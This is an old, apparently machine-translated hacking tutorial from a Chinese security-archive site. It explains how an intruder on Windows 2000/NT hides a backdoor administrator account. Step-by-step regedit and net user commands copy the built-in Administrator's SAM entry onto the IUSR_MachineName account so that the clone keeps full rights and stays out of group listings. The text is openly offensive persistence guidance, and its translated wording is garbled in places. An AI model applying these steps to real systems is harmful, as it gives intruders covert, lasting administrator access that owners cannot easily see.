Teach you in a mirroring system to copy the administrator account-vulnerability warning-the black bar safety net

ID MYHACK58:62200713851
Type myhack58
Reporter 佚名
Modified 2007-01-19T00:00:00


Often see some people in the invasion of a Windows 2 0 0 0 or Windows NT after the grandly create an Administrator group of users, it seems that when the administrator is not present generally, today, even contrary to what even the previous of the mind, Share one similar to the RootKit thing, of course, these processes are also possible with scripts, but I do not write, OK, Show Time Now.

First to let everyone know that the concept is in Windows 2 0 0 0 and Windows NT, the default administrator account SID is fixed 5 0 0 to 0x1f4, then we can use the machine in the presence of an account the SID is 5 0 0 the account to clone, here we select the account is IUSR_MachineName, of course, in order to strengthen the concealment, we choose this account, all users can use the following method, but the user is more common. testing environment for Windows 2 0 0 0 Server.

To run a System CMD Shell( http://www.sometips.com/tips/scripts/173.htm or use Http://www.sometips.com/soft/psu.exe), and then in the CMD Shell run:

regedit /e adam. reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

So we will be SID 5 0 0 the administrator account information related to the export, and then edit adam. reg file that will adam. reg file the third line of the--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]the last of the'1F4'to modify for the IUSR_MachineName of the SID most of the machine the user's SID is 0x3E9, if the machine in the initial installation does not install IIS, and create yourself an account and then install IIS it is possible to not this value of the Root. in the reg file'1F4'modified to'3E9'after execution:

regedit /s adam. reg

Import the Reg file, then run:

net user IUSR_MachineName Sometips

Modify the IUSR_MachineName password for the best use 1 4 bit of the password, the more like IUSR_MachineName password more.

Thus, we have and the default Administrator the same Desktop, the same Profile. Moreover, when we run net localgroup administrators, look at the results:

C:\>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domainMembers -------------------------------------------------------------------- Administrator The command completed successfully.

Then look at the USER2SID of the output results:

C:\>user2sid Administrator S-1-5-2 1-1 0 0 4 3 3 6 3 4 8-1 0 7 8 1 4 5 4 4 9-8 5 4 2 4 5 3 9 8-5 0 0 Number of subauthorities is 5 The Domain is IDONTKNOW Length of SID in memory is 2 8 bytes Type of SID is SidTypeUser C:\>user2sid iusr_machinename S-1-5-2 1-1 0 0 4 3 3 6 3 4 8-1 0 7 8 1 4 5 4 4 9-8 5 4 2 4 5 3 9 8-1 0 0 1 Number of subauthorities is 5 The Domain is IDONTKNOW Length of SID in memory is 2 8 bytes Type of SID is SidTypeUser

I think, and then crack the administrator also can't see any of the different shape...and, just the administrator changed to what password, I can still use the IUSR_MachineName password for Sometips landing...(not which heroes level administrators like to often modify the IUSR_MachineName for the other name.)